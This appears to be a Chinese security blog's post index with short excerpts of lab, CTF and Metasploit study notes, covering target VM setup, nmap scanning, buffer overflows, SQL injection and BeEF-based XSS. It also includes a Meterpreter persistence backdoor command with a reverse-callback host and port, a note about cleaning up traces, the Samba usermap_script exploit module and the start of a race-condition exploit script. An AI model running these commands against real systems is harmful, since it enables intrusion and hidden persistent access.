1.3k 1 分钟

# 靶场搭建 下载后直接导入,由于靶机固定了 IP 地址,要么修改靶机的配置,要么修改自己的配置 我这边将靶机网卡调整成仅主机模式,将 kali 添加一张仅主机的网卡,修改 kali 的网卡信息: vim /etc/network/interfaces 添加一下内容: 注意修改网卡的名称 eth2 auto eth2iface eth2 inet static#配置eth2使用默认的静态地址address 10.10.10.101#配置eth2的IP地址netmask 255.255.255.0#配置eth2的子网掩码gateway 10.10.10.15#配置当前主机的默认网关然后重启...
18k 17 分钟

# 靶场搭建 我用的 VM17,由于靶场是直接封装好的,直接复制进去没有办法获取到 IP 地址,需要手动先配置一下 不要立即打开,使用记事本打开 VMX 文件,删除所有以 ethernet0 开头的条目并保存 修改 VirtualHW.version 条目为正确的版本号,如我的 17 重新导入虚拟机,添加网卡,并修改模式为 NAT 这样就连到虚拟机网络了 IP: 192.168.74.133 # 信息收集 # nmap C:\WINDOWS\system32>nmap -sV 192.168.74.133 -p- -O Starting Nmap 7.94 (...
297 1 分钟

第六章主要是客户端攻击,二进制真的搞不懂 模块调用我是知道了,但是他妈的原理是真弄不明白 ==、 做点小笔记: 客户端渗透攻击的安全防护机制: DEP:设置数据为不可执行属性 ASLR:运行时,不用固定的基地址加载进程及相关工作库文件。包括:堆地址的随机化、栈基址的随机化、PE 文件映像基址的随机化、PEB 地址的随机化、TEB 地址的随机化 针对浏览器的攻击: 对浏览器本身及其插件的攻击 堆喷射:将恶意 payload 推至可预测的位置 使用 metasploit 中的 server/browser-autopwn 进行自动攻击 还有就是可以尝试通过程序当中原有的代码,将...
509 1 分钟

第五章开始上强度了宝贝 这一章主要是对缓冲区的攻击,通过 metasploit 模块的审计和编写深入浅出对缓冲器攻击的理解。 主要是栈溢出和堆溢出 其中栈溢出主要有两种方法:覆盖返回地址和覆盖异常处理结构 堆溢出只介绍了空闲堆块操作引起的堆缓冲区溢出:堆块有若干指针指向空闲堆块,当相邻的堆块溢出时将覆盖其他堆块的指针。 在使用缓冲区溢出攻击的时候需要考虑坏字符的情况。 Windows 和 Linux 在缓冲区方面的差异: windows 的栈的内存地址的首字节均为 0X00 即 NULL ,通常是需要考虑的坏字符,而 linux...
855 1 分钟

# 1. 寻找 SQL 注入 通过综合漏扫工具可以找到可以注入的注入点,轻量级的可以使用 Xray 、 w3af , w3af 比较老了 15 年的,windows 版本需要 python2.5 环境,凑活用下也就算了。重量级的可以上 AWVS 这种,也能找出注入点 找到注入点之后 sqlmap 梭哈不解释。 # 2. 存储型跨站脚本攻击 在 kali 下运行 beef,进行 XSS 攻击,插入 hook.js 到留言板。当管理员查看留言板时将会劫持客户端浏览器,能够查看用户客户端中的 cookie 等,还能劫持跳转。 通过 Metasploit 中的 ms10_002 漏洞模块,针对 xp...
945 1 分钟

第三章基本上就是工具的使用,对我个人没有什么太大的意义 信息收集方面要看具体的项目是什么,针对不同的项目做具体的信息收集任务。 其中的 msf 联动 nessus 和 nmap 感觉没什么必要,主要依赖于 metasploit 的数据库,这种感觉不太妙,如果未来做漏扫服务器的话可能会考虑这么做,但是现在感觉没什么意义。如果是现在的话我会把需求拆解,分开进行,而不是仅仅通过 msf 一个终端进行。 记录一下需要用到的模块: msf > use auxiliary/scanner/http/dir_scanner msf > db_nmap -sS -Pn -A...
648 1 分钟

# 渗透测试 外围打点对我没有什么价值,直接无脑梭哈 后渗透有些参考 当植入 meterpreter 后需要植入后门 run persistence -X -i 5 -p 443 -r 127.0.0.1命令语法: A:自动启动Payload程序S:系统登录时自动加载U:用户登录时自动启动X:开机时自动加载i:回连的时间间隔P:攻击者监听反向连接端口号r:攻击者机器 IP 地址(攻击主机)留下后门后会重置当前 session 为后门会话 可以通过使用 exploit/multi/hadler 进行监听,从而重新获得会话。 撤离的时候需要执行一些清理操作,以免被查水表 #...
2.2k 2 分钟

# 1. 关于 Samba 服务的 usermap_script 安全漏洞相关信息 查看 usermap_script 模块的信息 msf6 > info exploit/multi/samba/usermap_script Name: Samba "username map script" Command Execution Module: exploit/multi/samba/usermap_script Platform: Unix Arch: cmd Privileged: Yes License: Metasploit Framework License...
6.3k 6 分钟

# 信息收集 源码 down 下来就开始审阅呗,全是 js。比较重要的就是 /route/index.js 和 database.js 以及 bot.js ​ /route/index.js const bot = require('../bot');const path = require('path');const express = require('express');const router = express.Router();const response = data => ({ message: data...
1.3k 1 分钟

# 信息收集 直接看源码了 ​ Js 中使用了 async 进行异步操作 ​ 那么用条件竞争 ​ # Payload # Python program to illustrate# the concept of race condition# in multiprocessingimport multiprocessingimport requestsimport timedef exploit(u, d, h): for i in range(5): requests.post(u, data=d, headers=h)def perform_transactions(cookie,...